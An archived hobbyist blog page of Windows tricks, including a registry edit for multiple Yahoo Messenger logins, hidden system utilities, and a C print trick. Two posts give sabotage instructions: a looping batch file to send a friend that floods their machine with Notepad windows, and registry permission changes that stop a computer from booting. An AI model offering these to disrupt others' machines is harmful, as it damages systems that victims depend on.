Archive for 12/06/10

Open Notepad continuously in your computer

To Open Notepad continuously in your friend’s computer:
Type the code in notepad as :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as “notepad.BAT” and send it.
Note: If you want to try it, then go ahead and when you built this file double click to open it. But beware it slows your system and you will be left with no other option than to restart, as this script opens 100’s of notepad window. So, If you want to try this than save all your work and then run this file.

Posted in by » ραη¢нαηαη∂ «. No Comments

Multiple login in yahoo Without Using any Softwar

You can login with multiple id's on the same yahoo messenger without any download or patch .
Follow these steps :

1. Go to Start ----> Run . Type regedit, then enter .
2.Navigate to HKEY_CURRENT_USER --------> Software --->yahoo ----->pager---->Test
3.On the right page , right-click and choose new Dword value .
4.Rename it as Plural.
5.Double click and assign a decimal value of 1.

Its done!!
Now close registry and restart yahoo messenger and try Multiple Login

Posted in by » ραη¢нαηαη∂ «. No Comments

Hidden programs in windows

1- Private Character Editor
This program is for designing icons and Characters(Alphapet )
Click :start
Then :run
type :EUDCEDIT

2- iExpress
This Program is for converting your files to EXCUTABLE files
Click : start
Then : run
type : iexpress

3-Disk Cleanup
This program used for cleaning harddisk to offer space
Click : start
Then : run
type : cleanmgr

4-Dr Watson
This program Is for repairing problems in Windows
Click : start
Then : run
type : drwtsn32

5-Windows Media Player 5.1
Opens the old media player
Click : start
Then : run
type : mplay32

Posted in , by » ραη¢нαηαη∂ «. No Comments

Print any msg in c prog without using semicolon(;)

This is the program....................

#include
void main()
{
if(printf("Hello Friends"))
{}
}

Posted in by » ραη¢нαηαη∂ «. No Comments

Notepad fun.........

1. Open a blank Notepad file

2. Write .LOG as the first line of the file, followed by a enter. Save the file and close it.

3. Double-click the file to open it and notice that Notepad appends the current date and time to the end of the file and places the cursor on the line after.

4. Type your notes and then save and close the file.

After that open the file and see the changes.

by this trick u can also use ur notebook as a personal diary..

Posted in by » ραη¢нαηαη∂ «. No Comments

Stop to Reboot any system....

Honestly .. don't try these at college, if you get caught you may be charged and punished......

Anyways ....... if you log in to some admin account in XP, then open regedit, right click on HKEY_LOCAL_MACHINE , click Permissions, select SYSTEM and "deny" access.

repeat this for HKEY_USERS, next time the computer won't boot............

This may harm your computer So try this at your own risk.....................

Posted in by » ραη¢нαηαη∂ «. No Comments